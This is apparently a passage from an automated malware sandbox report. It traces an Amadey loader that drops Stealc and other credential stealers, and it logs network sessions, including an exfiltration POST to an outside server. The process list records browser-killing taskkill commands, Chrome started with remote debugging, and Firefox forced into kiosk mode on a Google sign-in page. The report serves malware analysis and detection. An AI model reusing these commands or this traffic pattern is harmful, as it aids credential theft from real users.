2024-11-05 17:46:26 UTC	192	OUT	GET /rules/rule702651v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:26 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:26 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDEC600CC" x-ms-request-id: 86212527-001e-0034-2d5c-2edd04000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174626Z-17df447cdb59mt7dhC1DFWqpg400000001n000000000a0t6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:26 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	49891	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:26 UTC	192	OUT	GET /rules/rule702650v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:26 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:26 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDEA1B544" x-ms-request-id: be3c2b5b-f01e-0071-6dd2-2c431c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174626Z-16547b76f7fj5p7mhC1DFWf8w400000005hg00000000kf9x x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:26 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69 61 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedia" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	49892	104.21.5.155	443	7788	C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:26 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=ZLCpBdYC7CSLSwdeJm_F41_inyCtte1.Hz7jIm_y__4-1730828783-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18168 Host: founpiuer.store
2024-11-05 17:46:26 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 34 35 39 33 42 35 44 34 35 44 33 34 32 32 37 45 35 44 34 37 33 44 34 37 42 31 42 35 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"214593B5D45D34227E5D473D47B1B584--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-11-05 17:46:26 UTC	2837	OUT	Data Raw: bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3
2024-11-05 17:46:27 UTC	1008	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hbb88oaqb1ml4hjt58obtrbmn0; expires=Sat, 01-Mar-2025 11:33:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ElhczCdn9APF4hbzrqzPTz2hFV4vkpGrIWCbEsbFqUwD4soDr56cc3pnkx%2FH0h6HNIWPnLm4ie65XpluRukKcoTYn7IkWo5DkEcwUNn4ooGsqHrxXi0IRV6yxsU0ij8zVak%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddea9cc4e37e76d-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18820&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2838&recv_bytes=19218&delivery_rate=154990&cwnd=32&unsent_bytes=0&cid=b4bda25587ded562&ts=623&x=0"
2024-11-05 17:46:27 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 0d 0a Data Ascii: 11ok 173.254.250.76
2024-11-05 17:46:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:44:52
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xf00000
File size:	3'235'328 bytes
MD5 hash:	80780678447355A2BC3157723D80033B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:44:55
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x940000
File size:	3'235'328 bytes
MD5 hash:	80780678447355A2BC3157723D80033B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:44:56
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x940000
File size:	3'235'328 bytes
MD5 hash:	80780678447355A2BC3157723D80033B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:46:00
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x940000
File size:	3'235'328 bytes
MD5 hash:	80780678447355A2BC3157723D80033B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	12:46:12
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe"
Imagebase:	0x350000
File size:	13'504'000 bytes
MD5 hash:	704D12A2E64A9B3EBE375594A11F3EE6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000007.00000002.2708343431.00000000120FE000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:46:19
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe"
Imagebase:	0x9c0000
File size:	3'147'776 bytes
MD5 hash:	BD02FBC4F962284AA8C9B6F50781EA8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2594123989.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2593346442.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2626495178.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2579817622.0000000000771000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2625482551.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2618539870.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2626432893.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:46:25
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe"
Imagebase:	0x170000
File size:	2'095'616 bytes
MD5 hash:	0625BFB508155BF72C447F0819C545A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000003.2593195591.0000000005020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2974865414.000000000110E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000002.2974865414.000000000110E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000002.2959179677.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	12:46:30
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe"
Imagebase:	0x6c0000
File size:	919'552 bytes
MD5 hash:	9BDCA68B008C8506E9070AA48676D172
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:46:30
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x400000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:46:30
Start date:	05/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:46:33
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0x400000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:46:33
Start date:	05/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:46:33
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0x400000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:46:33
Start date:	05/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:46:33
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe"
Imagebase:	0x9c0000
File size:	3'147'776 bytes
MD5 hash:	BD02FBC4F962284AA8C9B6F50781EA8A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000012.00000002.3009795349.0000000006161000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	12:46:33
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0x400000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:46:33
Start date:	05/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:46:34
Start date:	05/11/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x460000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2816159407.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2814519497.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	12:46:34
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0x400000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:46:34
Start date:	05/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:46:34
Start date:	05/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:46:34
Start date:	05/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:46:34
Start date:	05/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:46:36
Start date:	05/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:46:36
Start date:	05/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2276 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2204 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2f0dfb3-3ec4-49ae-8288-95dd845a4bda} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 28c8b06d910 socket
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:46:36
Start date:	05/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2260,i,3014244038502774906,14661954972306353127,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:46:37
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe"
Imagebase:	0x140000
File size:	2'778'112 bytes
MD5 hash:	6D60EE79CBE29830A8F4C2F7541D3E6C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:46:40
Start date:	05/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2260,i,3014244038502774906,14661954972306353127,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:46:42
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe"
Imagebase:	0x170000
File size:	2'095'616 bytes
MD5 hash:	0625BFB508155BF72C447F0819C545A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000021.00000002.2958992788.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000021.00000003.2752270526.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	12:46:44
Start date:	05/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
